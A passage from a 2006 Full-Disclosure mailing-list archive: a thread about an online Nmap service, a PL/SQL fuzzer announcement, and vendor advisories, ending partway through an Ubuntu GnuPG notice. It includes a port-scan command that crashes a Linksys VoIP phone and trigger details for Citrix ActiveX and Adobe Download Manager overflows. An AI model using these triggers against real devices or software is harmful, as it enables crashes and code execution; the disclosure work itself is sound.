6 12:07:46 2006 From: timo.schoeler at riscworks.net (Timo Schoeler) Date: Wed, 06 Dec 2006 13:07:46 +0100 Subject: [Full-disclosure] Nmap Online In-Reply-To: <45767B17.9000103@gmail.com> References: <45767B17.9000103@gmail.com> Message-ID: <4576B292.3020809@riscworks.net> thus Schanulleke spake: > Simon Smith wrote: >> Why would you do this? >> >>> For all Nmap fans, our group have implemented Nmap Online service. >>> Its address is http://nmap-online.com/. The interface allows you to perform >>> custom > > Because you like lawers and being in court? lawyers are wimps :) From joxeankoret at yahoo.es Wed Dec 6 13:18:55 2006 From: joxeankoret at yahoo.es (Joxean Koret) Date: Wed, 06 Dec 2006 14:18:55 +0100 Subject: [Full-disclosure] Oracle PL/SQL Fuzzing Tool Message-ID: <1165411136.11029.12.camel@localhost.localdomain> Hi to all, In the past I wrote a python tool to fuzz PL/SQL procedures, functions and packages. With this wonderfull tool I found many vulnerabilities, many crashes and many-many interesting issues. I decided to release it to the public because it's a part of an Oracle specific Vulnerability Assesment Tool I will release when it's completely finished. It will be licensed under the GPL. To use the attached python tool you will need a valid Oracle database account with, at least, the CREATE SESSION privilege granted. You will need to adapt it to your feets to fuzz a database under your control. At least: username, password, Oracle SID and IP address. It only fuzzes 'VARCHAR2', 'RAW', 'NCHAR', 'BINARY_INTEGER', 'BINARY_FLOAT', 'CHAR', 'NVARCHAR2', 'NUMBER', 'FLOAT' and 'LONG RAW' datatypes, at the moment, but you can easily adapt it to fuzz other Oracle datatypes, even user defined. Well, if you find it interesting or if you have any question about, any criticism, etc... Don't heasitate to contact me. Take fun. --- Joxean Koret ----------------------------------- Agian, agian, eg?n batez jeikiko dira egiazko Ziberotarrak, egiazko e?skald?nak, tirano arrotzen hiltzeko eta gure aiten aitek ?tzi daikien lurraren pop?liari erremetitzeko. ----------------------------------- -------------- next part -------------- A non-text attachment was scrubbed... Name: oldfuzzer.py Type: text/x-python Size: 7954 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061206/99331b9e/attachment.py -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada digitalmente Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061206/99331b9e/attachment.bin From sniffhog at yahoo.com Wed Dec 6 15:02:44 2006 From: sniffhog at yahoo.com (Reece Mills) Date: Wed, 6 Dec 2006 07:02:44 -0800 (PST) Subject: [Full-disclosure] Another former 'hacker' now 'security guru' Message-ID: <20061206150244.48845.qmail@web55004.mail.re4.yahoo.com> f8 labs' very own eric 'loki' hines goes national... http://www.foxnews.com/video2/launchPage.html?120406/120406_cav_hines&Cyber%20Security&Your_World&Former%20computer%20hacker%3A%20Al%20Qaeda%20can%20pull%20off%20cyber%20attack&Your%20World&-1&Cyber%20Security&Video%20Launch%20Page&Business --------------------------------- Everyone is raving about the all-new Yahoo! Mail beta. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061206/a477acc1/attachment.html From announce-noreply at rpath.com Wed Dec 6 17:10:29 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Wed, 06 Dec 2006 12:10:29 -0500 Subject: [Full-disclosure] rPSA-2006-0226-1 kernel Message-ID: <4576f985.Gu8hm2wuXwNVRhz3%announce-noreply@rpath.com> rPath Security Advisory: 2006-0226-1 Published: 2006-12-06 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Local Root Non-deterministic Privilege Escalation Updated Versions: kernel=/conary.rpath.com at rpl:devel//1/2.6.17.14-0.4-1 kernel=/conary.rpath.com at rpl:devel//1-xen/2.6.16.29-0.11-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5751 https://issues.rpath.com/browse/RPL-803 https://issues.rpath.com/browse/RPL-837 Description: Previous versions of the kernel package are vulnerable to a local denial of service or privilege escalation attack by unprivileged users if any network bridge interface has been configured with more than two interfaces. The attacker can cause the system to crash, and is believed to be able to provide arbitrary code that may (with undetermined probability) run in kernel context. Xen dom0 instances in the default bridging configuration are vulnerable. Previous versions of the Xen dom0 kernel did not embed the firmware for QLogic 2XXX Fibre Channel adapters, disabling Xen dom0 on those systems. This update requires a system reboot to implement the fixes. From full-disclosure at kharkerlake.net Wed Dec 6 18:21:44 2006 From: full-disclosure at kharkerlake.net (Christian "Khark" Lauf) Date: Wed, 06 Dec 2006 19:21:44 +0100 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: Message-ID: <45770A38.3040508@kharkerlake.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, Greg wrote: > I don't wish to upset anyone but that answer has to be the craziest FIRST > "port of call" approach I have seen used. I get plenty of those sorts of > calls. I take about 30 seconds time on the phone for almost all of them. I > say "Pull the power plug out of the router. Wait 10 seconds, plug it back in > and wait another 10 seconds. OK, try now" and almost all of them report it > works well. What about the people whose router configuration (which was done by a friend months/years ago) you just resetted? Better prepare for some house visits to restore SOHO router configurations :-) And I think that the more you know about a certain topic, the more you are able to find nice & half-decent solutions. Resetting the whole device just because of what is a maybe temporarly problem doesn't seem clever to me. But I understand your point.. At some point in time first level support gets boring. Regards, Christian - -- Christian "Khark" Lauf GPG: 0x6AADC60A | IRCnet/silcnyet: Khark silcnyet-Fingerprint: 82DA 447F B957 1E18 82EC 44B7 1800 CC3C 0EDE 6DCA -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (MingW32) iD4DBQFFdwo4AaLWKGqtxgoRAuh2AJdpFYr/jK1AA4J00HgFedIgDrJvAJ0UnxbQ I8Xie+CGT9qOUvKv0WeanA== =lWLi -----END PGP SIGNATURE----- From security at mandriva.com Wed Dec 6 19:02:00 2006 From: security at mandriva.com (security at mandriva.com) Date: Wed, 6 Dec 2006 12:02:00 -0700 Subject: [Full-disclosure] [ MDKSA-2006:225 ] - Updated ruby packages fix DoS vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:225 http://www.mandriva.com/security/ _______________________________________________________________________ Package : ruby Date : December 6, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Another vulnerability has been discovered in the CGI library (cgi.rb) that ships with Ruby which could be used by a malicious user to create a denial of service attack (DoS). Updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6303 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: cf4eb0abe6d54c41a9b7e94adbd894ab 2006.0/i586/ruby-1.8.2-7.5.20060mdk.i586.rpm 42a501b32ad7f9c1140d2665a8c35bdf 2006.0/i586/ruby-devel-1.8.2-7.5.20060mdk.i586.rpm fadf1005a3cecb41da322d6472023562 2006.0/i586/ruby-doc-1.8.2-7.5.20060mdk.i586.rpm 6754c4c9f5047d032a15819820595fcb 2006.0/i586/ruby-tk-1.8.2-7.5.20060mdk.i586.rpm fb133b0d4f1b5eb27e67f0eb39772564 2006.0/SRPMS/ruby-1.8.2-7.5.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: a68db589ace220742904a49587e65087 2006.0/x86_64/ruby-1.8.2-7.5.20060mdk.x86_64.rpm 7f14ec97214b7f501c7bcd8963ad2b0a 2006.0/x86_64/ruby-devel-1.8.2-7.5.20060mdk.x86_64.rpm 5b6604fd9628a2312ee2b7f3b4371f45 2006.0/x86_64/ruby-doc-1.8.2-7.5.20060mdk.x86_64.rpm ba38430b90e8b454c7b2228073c4d3dd 2006.0/x86_64/ruby-tk-1.8.2-7.5.20060mdk.x86_64.rpm fb133b0d4f1b5eb27e67f0eb39772564 2006.0/SRPMS/ruby-1.8.2-7.5.20060mdk.src.rpm Mandriva Linux 2007.0: b126d91632869a7a659f7044cbca180c 2007.0/i586/ruby-1.8.5-2.2mdv2007.0.i586.rpm a1414e09dcb3d0c858e3fc5070608e47 2007.0/i586/ruby-devel-1.8.5-2.2mdv2007.0.i586.rpm d6bf66762039af18a6c5f0a8b27d2bfa 2007.0/i586/ruby-doc-1.8.5-2.2mdv2007.0.i586.rpm 017468bee38279e7f42adad194866cff 2007.0/i586/ruby-tk-1.8.5-2.2mdv2007.0.i586.rpm 45e958263f67f96797318621052f1e3f 2007.0/SRPMS/ruby-1.8.5-2.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 2721a9103870075c0e64dd1a7c01b9a5 2007.0/x86_64/ruby-1.8.5-2.2mdv2007.0.x86_64.rpm 6b6bd12e97b4ddf070849603bea45623 2007.0/x86_64/ruby-devel-1.8.5-2.2mdv2007.0.x86_64.rpm 2e163941297e43e62d2f798a93efe960 2007.0/x86_64/ruby-doc-1.8.5-2.2mdv2007.0.x86_64.rpm d953012dc537a4f6e8343138d8f32f31 2007.0/x86_64/ruby-tk-1.8.5-2.2mdv2007.0.x86_64.rpm 45e958263f67f96797318621052f1e3f 2007.0/SRPMS/ruby-1.8.5-2.2mdv2007.0.src.rpm Corporate 3.0: 95abd86462f84450392cd41ab5946666 corporate/3.0/i586/ruby-1.8.1-1.8.C30mdk.i586.rpm 174fe6c12a1a6a7dbf03f755cf0a57cd corporate/3.0/i586/ruby-devel-1.8.1-1.8.C30mdk.i586.rpm 2d0e7d3f950e7040f6e6c19a921bdb78 corporate/3.0/i586/ruby-doc-1.8.1-1.8.C30mdk.i586.rpm 37fe39a689b25aa2caf193994a5dbf05 corporate/3.0/i586/ruby-tk-1.8.1-1.8.C30mdk.i586.rpm 71b024abd10b00f7e278e39492f98aa6 corporate/3.0/SRPMS/ruby-1.8.1-1.8.C30mdk.src.rpm Corporate 3.0/X86_64: 366a4003551813d500eec00996981abf corporate/3.0/x86_64/ruby-1.8.1-1.8.C30mdk.x86_64.rpm ef95e042be0f3a881ae6a66502c1c905 corporate/3.0/x86_64/ruby-devel-1.8.1-1.8.C30mdk.x86_64.rpm d72e56164f0a0fcb99b190dbb2ce7c2c corporate/3.0/x86_64/ruby-doc-1.8.1-1.8.C30mdk.x86_64.rpm 81c6c9a396d26dea3bd683c2207eb96b corporate/3.0/x86_64/ruby-tk-1.8.1-1.8.C30mdk.x86_64.rpm 71b024abd10b00f7e278e39492f98aa6 corporate/3.0/SRPMS/ruby-1.8.1-1.8.C30mdk.src.rpm Corporate 4.0: 9796f3458efc694c98ab821158a0599b corporate/4.0/i586/ruby-1.8.2-7.5.20060mlcs4.i586.rpm 3578dc2bd6735967f79f43b21b14f8b2 corporate/4.0/i586/ruby-devel-1.8.2-7.5.20060mlcs4.i586.rpm 4505b6152a025ecef599e48c4ef11763 corporate/4.0/i586/ruby-doc-1.8.2-7.5.20060mlcs4.i586.rpm 466b48eb68199179c044b8a0fe5f7a3f corporate/4.0/i586/ruby-tk-1.8.2-7.5.20060mlcs4.i586.rpm b7f41e2f4f5f71e3c2f214c041957533 corporate/4.0/SRPMS/ruby-1.8.2-7.5.20060mlcs4.src.rpm Corporate 4.0/X86_64: 2771fffe29e377ea0bcf594bb94a0f7b corporate/4.0/x86_64/ruby-1.8.2-7.5.20060mlcs4.x86_64.rpm 2d0b06a00590a0dfae303be8079f852a corporate/4.0/x86_64/ruby-devel-1.8.2-7.5.20060mlcs4.x86_64.rpm 87d597d03cc146b1b9ac89e29b7a2879 corporate/4.0/x86_64/ruby-doc-1.8.2-7.5.20060mlcs4.x86_64.rpm ec2d09506bfebab08d523fd258f8136b corporate/4.0/x86_64/ruby-tk-1.8.2-7.5.20060mlcs4.x86_64.rpm b7f41e2f4f5f71e3c2f214c041957533 corporate/4.0/SRPMS/ruby-1.8.2-7.5.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFduZamqjQ0CJFipgRAv9iAKDPZ8d8ORe8hjsnV+kvVFm9ZHsZZwCcD/PC 3qAszwS/61EmGp8G9xExGA8= =cEew -----END PGP SIGNATURE----- From full-disclosure3 at pchandyman.com.au Wed Dec 6 20:41:09 2006 From: full-disclosure3 at pchandyman.com.au (Greg) Date: Thu, 7 Dec 2006 07:41:09 +1100 Subject: [Full-disclosure] Nmap Online In-Reply-To: <45770A38.3040508@kharkerlake.net> Message-ID: > -----Original Message----- > From: Christian "Khark" Lauf [mailto:full-disclosure at kharkerlake.net] > Sent: Thursday, 7 December 2006 5:22 AM > To: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] Nmap Online > > > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hi, > > Greg wrote: > > > I don't wish to upset anyone but that answer has to be the craziest > > FIRST "port of call" approach I have seen used. I get > plenty of those > > sorts of calls. I take about 30 seconds time on the phone > for almost > > all of them. I say "Pull the power plug out of the router. Wait 10 > > seconds, plug it back in and wait another 10 seconds. OK, > try now" and > > almost all of them report it works well. > > What about the people whose router configuration (which was > done by a friend months/years ago) you just resetted? Better > prepare for some house visits to restore SOHO router > configurations :-) I am fairly certain that the NV in NV-ram doesn't mean "New Victim" but "Non Volatile". Eg, even if nothing else works so you pull the plug and put it back in, the settings you have changed remain intact. So, in most cases, no you do not need to worry when pulling the plug. > > And I think that the more you know about a certain topic, the > more you are able to find nice & half-decent solutions. > Resetting the whole device just because of what is a maybe > temporarly problem doesn't seem clever to me. > That wasn't what I said of course. The whole point was that if the user is complaining about not getting email from their ISP via whatever method they decide to use and/or cannot get onto the web, then pulling the power plug is a viable answer that is normally correct in most situations. Sure, there are some where it isn't the answer but if you find out it is still as bad as it ever was after pulling the plug and putting it back in, then you need to go there, physically, in any case. > But I understand your point.. At some point in time first > level support gets boring. > It wasn't even that which I said. My point was always that there are better ways of doing things. You could drive 30 miles just to pull the plug yourself leaving the current job unfinished or unable to get to that next problem in a suitable response time or you could just tell the person on the phone to do that while you wait and see the result. In most cases, it has been the answer. It has never ALWAYS been the case. In the cases where it works, it is just a more efficient way for YOU to work. No "online" answer is going to fix a router that just lost its cool and is locked up unless you have installed a remote power down and power up (yeah, they exist but I haven't used one and cant remember the name). The end result of working this way is a happy customer who is now able to work, a contact who feels superior because they worked with you to fix the problem and is more likely to help you out in future when you want something done that they are capable of doing and you can get to your next appointment on time. Call me crazy but I reckon trying it first is always the best approach. Greg. From kees at ubuntu.com Thu Dec 7 00:30:18 2006 From: kees at ubuntu.com (Kees Cook) Date: Wed, 6 Dec 2006 16:30:18 -0800 Subject: [Full-disclosure] [USN-390-3] evince-gtk vulnerability Message-ID: <20061207003018.GZ6550@outflux.net> =========================================================== Ubuntu Security Notice USN-390-3 December 06, 2006 evince-gtk vulnerability CVE-2006-5864 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: evince-gtk 0.5.2-0ubuntu2.1 Ubuntu 6.10: evince-gtk 0.5.2-0ubuntu4.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-390-2 fixed vulnerabilities in evince. This update provides the corresponding update for evince-gtk. Original advisory details: A buffer overflow was discovered in the PostScript processor included in evince. By tricking a user into opening a specially crafted PS file, an attacker could crash evince or execute arbitrary code with the user's privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1.diff.gz Size/MD5: 22511 0cf118d6918268ba4f53c9b21c2e4abc http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1.dsc Size/MD5: 893 6bd5d56c1d26042f0882ad1c8f35d8c4 http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2.orig.tar.gz Size/MD5: 1362513 5020afb1768d89c251ad8c2a233d9fcf amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1_amd64.deb Size/MD5: 311524 9afc1a61adb192c0c115bcc8231008c1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1_i386.deb Size/MD5: 282212 15a8292c95bed93d2af5d4917172ca8c powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1_powerpc.deb Size/MD5: 299064 510f7b8c93b8a8a65f71cae17176cd59 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1_sparc.deb Size/MD5: 287254 f75088c1015e44cf7ed2633340d0d24f Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1.diff.gz Size/MD5: 22622 194a824da15c50fe472762f960f2b9fb http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1.dsc Size/MD5: 893 24d9a86b4a012fd133ee37b538e9156c http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2.orig.tar.gz Size/MD5: 1362513 5020afb1768d89c251ad8c2a233d9fcf amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1_amd64.deb Size/MD5: 305732 af144ed0736a7ef77aba67ef9cbbeaae i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1_i386.deb Size/MD5: 286362 21f58e429f79a605fa2bff0c36a7cbb6 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1_powerpc.deb Size/MD5: 293918 c9e00c6154cddae33bd8c99afbace8fd sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1_sparc.deb Size/MD5: 282784 596cfcc780feac5016866a46375cbc42 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061206/53b5b383/attachment.bin From zdi-disclosures at 3com.com Thu Dec 7 01:01:12 2006 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Wed, 6 Dec 2006 17:01:12 -0800 Subject: [Full-disclosure] ZDI-06-044: Adobe Download Manager AOM Parsing Buffer Overflow Vulnerability Message-ID: ZDI-06-044: Adobe Download Manager AOM Parsing Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-044.html December 6, 2006 -- CVE ID: CVE-2006-5856 -- Affected Vendor: Adobe -- Affected Products: Adobe Download Manager 2.1 and earlier -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since April 3, 2006 by Digital Vaccine protection filter ID 4280. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Download Manager application. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists in the AOM file format parser. A long [URL] element inside of a [DownloadRecord] element within an AOM file will result in a stack-based buffer overflow condition leading to execution of arbitrary code. The Download Manager is installed during the installation of of other Adobe products, such as Acrobat Reader. When installed, the download manager becomes the default application to handle .AOM files. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/go/apsb06-19/ -- Disclosure Timeline: 2006.04.03 - Digital Vaccine released to TippingPoint customers 2006.04.07 - Vulnerability reported to vendor 2006.12.06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. From announce-noreply at rpath.com Wed Dec 6 21:34:50 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Wed, 06 Dec 2006 16:34:50 -0500 Subject: [Full-disclosure] rPSA-2006-0227-1 gnupg Message-ID: <4577377a.C5GCoI5KeAX9EO9W%announce-noreply@rpath.com> rPath Security Advisory: 2006-0227-1 Published: 2006-12-06 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Indirect Deterministic Privilege Escalation Updated Versions: gnupg=/conary.rpath.com at rpl:devel//1/1.4.6-0.1- References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6235 https://issues.rpath.com/browse/RPL-835 Description: Previous versions of the gnupg package will execute attacker-provided code found in intentionally malformed OpenPGP packets. This allows an attacker to run arbitrary code as the user invoking gpg on the file that contains the malformed packets. From mike.vasquez at gmail.com Wed Dec 6 18:00:37 2006 From: mike.vasquez at gmail.com (Mike Vasquez) Date: Wed, 6 Dec 2006 11:00:37 -0700 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <1b0d006c0612051905h39ce657bh214cf60a48be253d@mail.gmail.com> Message-ID: <28f529ba0612061000v4a35b5dr185cd9f329488192@mail.gmail.com> 1) I'm sure none of you can imagine this, but sometimes running and startup configs aren't the same. YES it's TRUE! So, your approach could be disastrous and is really ill advised. 2) Nmap may not give reliable results from all sites. Surely you've encounted ACLs that caused erroneous nmap results from some locations. As the guy said: sometimes he travels. Having the capability to run it from a neutral location can get by that. I'm sure there's more..... On 12/5/06, Greg wrote: > > > > I don't wish to upset anyone but that answer has to be the craziest FIRST > "port of call" approach I have seen used. I get plenty of those sorts of > calls. I take about 30 seconds time on the phone for almost all of them. I > say "Pull the power plug out of the router. Wait 10 seconds, plug it back > in > and wait another 10 seconds. OK, try now" and almost all of them report it > works well. > > So why would I need and how could I use Nmap online to tell me the router > went crazy and locked up? > > Besides, wouldn't it be just as easy to use the Nmap sitting on my > computer > if I decided I needed to use it? > > Greg. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061206/a44bc57e/attachment.html From TSRT at 3com.com Thu Dec 7 01:21:19 2006 From: TSRT at 3com.com (TSRT at 3com.com) Date: Wed, 6 Dec 2006 17:21:19 -0800 Subject: [Full-disclosure] TSRT-06-15: Citrix Presentation Server Client ActiveX Heap Overflow Vulnerability Message-ID: TSRT-06-15: Citrix Presentation Server Client ActiveX Heap Overflow Vulnerability http://www.tippingpoint.com/security/advisories/TSRT-06-15.html December 6, 2006 -- CVE ID: CVE-2006-6334 -- Affected Vendor: Citrix -- Affected Products: Citrix Presentation Server Client for Windows < v9.230 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since February 2006 by a pre-existing Digital Vaccine protection filter ID 4163. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Citrix Presentation Server Client for Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw resides in the SendChannelData function of the ActiveX control Wfica.ocx (CLSID 238F6F83-B8B4-11CF-8771-00A024541EE3). The function is prototyped as follows: SendChannelData(ChannelName As String, Data As String, DataSize As Long, DataType As ICAVCDataType) Specifying an undersized buffer length as the 'DataSize' parameter and supplying a large buffer as the 'Data' parameter results in an exploitable heap corruption. -- Vendor Response: Citrix has issued an update to correct this vulnerability. More details can be found at: http://support.citrix.com/article/CTX111827 -- Disclosure Timeline: 2006.02.01 - Pre-existing Digital Vaccine released to TippingPoint customers 2006.09.19 - Vulnerability reported to vendor 2006.12.06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Aaron Portnoy, TippingPoint Security Research Team. From shawnmer at gmail.com Wed Dec 6 18:40:19 2006 From: shawnmer at gmail.com (Shawn Merdinger) Date: Wed, 6 Dec 2006 10:40:19 -0800 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan Message-ID: Vulnerability Description ================== The Linksys WIP 330 VoIP wireless phone will crash when a full port-range Nmap scan is run against its IP address. Linksys WIP 330 Firmware Version ========================== 1.00.06A Nmap scan command ================ nmap -P0 -p 1-65535 Impact ===== The crash is only after Nmap has finished. The Nmap scan also seems to disrupt updating of the display as the clock is not updated. The crash appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 operating system. Screenshot of the crash: http://www.flickr.com/photos/metalmijn/295348294/ Credit ==== Credit for discovering this vulnerability goes to Armijn Hemel From kees at ubuntu.com Thu Dec 7 02:37:50 2006 From: kees at ubuntu.com (Kees Cook) Date: Wed, 6 Dec 2006 18:37:50 -0800 Subject: [Full-disclosure] [USN-393-1] GnuPG vulnerability Message-ID: <20061207023750.GA6550@outflux.net> =========================================================== Ubuntu Security Notice USN-393-1 December 07, 2006 gnupg vulnerability CVE-2006-6235 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: gnupg 1.4.1-1ubuntu1.6 Ubuntu 6.06 LTS: gnupg 1.4.2.2-1ubuntu2.4 Ubuntu 6.10: gnupg 1.4.3-2ubuntu3.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Tavis Ormandy discovered that gnupg was incorrectly using the stack. If a user were tricked into processing a specially crafted message, an attacker could execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6.diff.gz Size/MD5: 23701 7a9033efbfb1f0028f53cef54f1a6522 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6.dsc Size/MD5: 684 4740552c8acbe2143bfff11dbfaee85b http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1.orig.tar.gz Size/MD5: 4059170 1cc77c6943baaa711222e954bbd785e5 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6_amd64.deb Size/MD5: 1136698 64e954a21f51c939792b140f5a0fc5df http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.6_amd64.udeb Size/MD5: 152276 c703faddbf82858fa85560912ea3f7b0 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6_i386.deb Size/MD5: 1044848 6dc25f6204f754f80b15f90bac175a25 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.6_i386.udeb Size/MD5: 130672 3a69e1804fb1234a70d9715d42b929e1 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6_powerpc.deb Size/MD5: 1120042 16103aee54c188b9e74b81d776537bc4 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.6_powerpc.udeb Size/MD5: 140218 fcc41df5bf7d7336ac00ab8a1edaa665 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6_sparc.deb Size/MD5: 1064838 8c78b6bca94a9bc62a9d7a9f5a8ae298 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.6_sparc.udeb Size/MD5: 139598 830785d65ea4bdb0d8ed8d123fcb2d6f Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4.diff.gz Size/MD5: 22621 3e45e6fe65cd1334a12d6bfbc9d26f2b http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4.dsc Size/MD5: 690 1ce5bd388f35b6bdd48e12719308cea5 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2.orig.tar.gz Size/MD5: 4222685 